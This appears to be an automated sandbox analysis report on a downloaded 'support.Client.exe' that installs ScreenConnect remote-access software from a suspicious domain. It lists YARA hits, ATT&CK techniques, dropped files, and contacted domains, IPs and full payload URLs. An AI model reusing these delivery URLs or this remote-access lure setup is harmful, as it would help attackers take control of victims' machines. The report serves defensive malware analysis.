              Source: svchost.exe, 0000000A.00000002.2408198631.000001F8A4F02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Downloads\support.Client.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
              Source: Yara matchFile source: 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 7692, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7256, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 2212, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts41
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		121
              Disable or Modify Tools              		OS Credential Dumping2
              File and Directory Discovery              		Remote ServicesData from Local System1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API              		2
              Windows Service              		2
              Windows Service              		1
              Timestomp              		LSASS Memory55
              System Information Discovery              		Remote Desktop ProtocolData from Removable Media1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Command and Scripting Interpreter              		1
              Browser Extensions              		12
              Process Injection              		1
              DLL Side-Loading              		Security Account Manager61
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		21
              Masquerading              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchd1
              Registry Run Keys / Startup Folder              		1
              Registry Run Keys / Startup Folder              		1
              Modify Registry              		LSA Secrets71
              Virtualization/Sandbox Evasion              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
              Bootkit              		RC Scripts71
              Virtualization/Sandbox Evasion              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Process Injection              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Hidden Users              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Bootkit              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Rundll32              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544862 URL: https://cp9856.chelokipotle... Startdate: 29/10/2024 Architecture: WINDOWS Score: 68 65 cp9856.chelokipotlester.icu 2->65 67 fp2e7a.wpc.phicdn.net 2->67 69 3 other IPs or domains 2->69 81 .NET source code references suspicious native API functions 2->81 83 Contains functionality to hide user accounts 2->83 85 AI detected suspicious URL 2->85 10 chrome.exe 20 2->10         started        14 ScreenConnect.ClientService.exe 2->14         started        17 svchost.exe 2->17         started        19 7 other processes 2->19 signatures3 process4 dnsIp5 75 192.168.2.16, 138, 443, 49485 unknown unknown 10->75 77 239.255.255.250 unknown Reserved 10->77 59 C:\Users\user\...\support.Client.exe (copy), PE32 10->59 dropped 61 bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp, PE32 10->61 dropped 63 C:\Users\...\Unconfirmed 974768.crdownload, PE32 10->63 dropped 21 support.Client.exe 2 10->21         started        23 chrome.exe 10->23         started        27 chrome.exe 10->27         started        29 chrome.exe 10->29         started        89 Reads the Security eventlog 14->89 91 Reads the System eventlog 14->91 31 ScreenConnect.WindowsClient.exe 14->31         started        34 ScreenConnect.WindowsClient.exe 14->34         started        93 Changes security center settings (notifications, updates, antivirus, firewall) 17->93 36 MpCmdRun.exe 17->36         started        79 127.0.0.1 unknown unknown 19->79 file6 signatures7 process8 dnsIp9 38 dfsvc.exe 132 117 21->38         started        71 cp9856.chelokipotlester.icu 37.221.67.19, 443, 49705, 49706 FIRSTDC-ASRU Russian Federation 23->71 73 www.google.com 142.250.185.228, 443, 49710, 49735 GOOGLEUS United States 23->73 57 Chrome Cache Entry: 128, PE32 23->57 dropped 99 Contains functionality to hide user accounts 31->99 41 conhost.exe 36->41         started        file10 signatures11 process12 file13 49 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 38->49 dropped 51 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 38->51 dropped 53 ScreenConnect.WindowsBackstageShell.exe, PE32 38->53 dropped 55 13 other files (none is malicious) 38->55 dropped 43 ScreenConnect.WindowsClient.exe 38->43         started        process14 signatures15 87 Contains functionality to hide user accounts 43->87 46 ScreenConnect.ClientService.exe 43->46         started        process16 signatures17 95 Contains functionality to hide user accounts 46->95 97 Enables network access during safeboot for specific services 46->97

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.ClientService.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\ScreenConnect.Core.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\ScreenConnect.Windows.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe4%ReversingLabs
              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\ScreenConnect.Client.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\ScreenConnect.ClientService.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe4%ReversingLabs
              C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exe0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.fontbureau.com/designers0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://www.w3.or0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.fontbureau.com/designers/frere-jones.html0%URL Reputationsafe
              http://www.fontbureau.com/designersG0%URL Reputationsafe
              http://www.fontbureau.com/designers/?0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.fontbureau.com/designers?0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://schemas.micro0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.w3.o0%URL Reputationsafe
              http://www.fonts.com0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.fontbureau.com0%URL Reputationsafe
              http://www.xrml.org/schema/2001/11/xrml2core0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              		199.232.210.172
              		truefalse
                		unknown
                www.google.com
                		142.250.185.228
                		truefalse
                  		unknown
                  cp3back96.site
                  		37.221.67.19
                  		truefalse
                    		unknown
                    cp9856.chelokipotlester.icu
                    		37.221.67.19
                    		truetrue
                      		unknown
                      fp2e7a.wpc.phicdn.net
                      		192.229.221.95
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe.configfalse
                          		unknown
                          https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.dllfalse
                            		unknown
                            https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Sessionfalse
                              		unknown
                              https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe.configfalse
                                		unknown
                                https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=false
                                  		unknown
                                  https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exefalse
                                    		unknown
                                    https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.manifestfalse
                                      		unknown
                                      https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.dllfalse
                                        		unknown
                                        https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Core.dllfalse
                                          		unknown
                                          https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configfalse
                                            		unknown
                                            https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exefalse
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.xsvchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://www.fontbureau.com/designersdfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://wl3.org/2000/0mldsig#sha1odfsvc.exe, 0000000E.00000002.2366106744.00000212BEE92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://www.sajatypeworks.comdfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000007.00000002.1367177095.0000024F94681000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367108889.0000024F94665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366519593.0000024F9465A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://wk3.org/2000/0pldsig#sha1qsdfsvc.exe, 0000000E.00000002.2367122651.00000212BEEF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://www.founder.com.cn/cn/cThedfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exdfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367042117.0000024F94644000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://cp9856.chelokipotldfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmptrue
                                                                  		unknown
                                                                  http://www.galapagosdesign.com/DPleasedfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.urwpp.deDPleasedfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.zhongyicts.com.cndfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 0000000E.00000002.2346639670.00000212A3221000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000013.00000002.2412131785.00000000022AC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000015.00000002.2005207241.0000000002EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.bingmapsportal.comsvchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000007.00000002.1367024630.0000024F9463F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367108889.0000024F94665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366519593.0000024F9465A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://t0.ssl.ak.dynamic.tiles.virtsvchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManagpdfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configtdfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe.config-Udfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationxdfsvc.exe, 0000000E.00000002.2346639670.00000212A362E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationwdfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientSedfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationsdfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://www.w3.ordfsvc.exe, 0000000E.00000002.2346639670.00000212A3544000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A35EB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A38E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3908000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://crl.ver)svchost.exe, 00000004.00000002.2413049971.00000227B8E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClientScreenConnect.WindowsClient.exe, 00000011.00000002.1946552132.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, C7EOHWRV.log.14.drfalse
                                                                                              		unknown
                                                                                              https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationZScreenConnect.WindowsClient.exe, 00000011.00000002.1948396561.000000001B42D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000007.00000003.1366532997.0000024F94649000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://t0.ssl.ak.dynamic.tiles.virtuXsvchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application089a7ScreenConnect.WindowsClient.exe, 00000011.00000002.1948935379.000000001B484000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 00000007.00000002.1367091647.0000024F94659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://www.carterandcone.comldfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstagedfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Windows.dll63:dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://www.fontbureau.com/designers/frere-jones.htmldfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationKdfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://dynamic.tsvchost.exe, 00000007.00000003.1366457343.0000024F9465D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://g.live.com/odclientsettings/Prod-C:edb.log.4.drfalse
                                                                                                                    		unknown
                                                                                                                    https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 00000011.00000002.1946552132.0000000002A5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationuLXGWokldfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationre=msiladfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000007.00000002.1367177095.0000024F94681000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000007.00000003.1366532997.0000024F94649000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application1dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://www.fontbureau.com/designersGdfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Cliedfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://www.fontbureau.com/designers/?dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.founder.com.cn/cn/bThedfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application8ScreenConnect.WindowsClient.exe, 00000011.00000002.1948935379.000000001B484000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
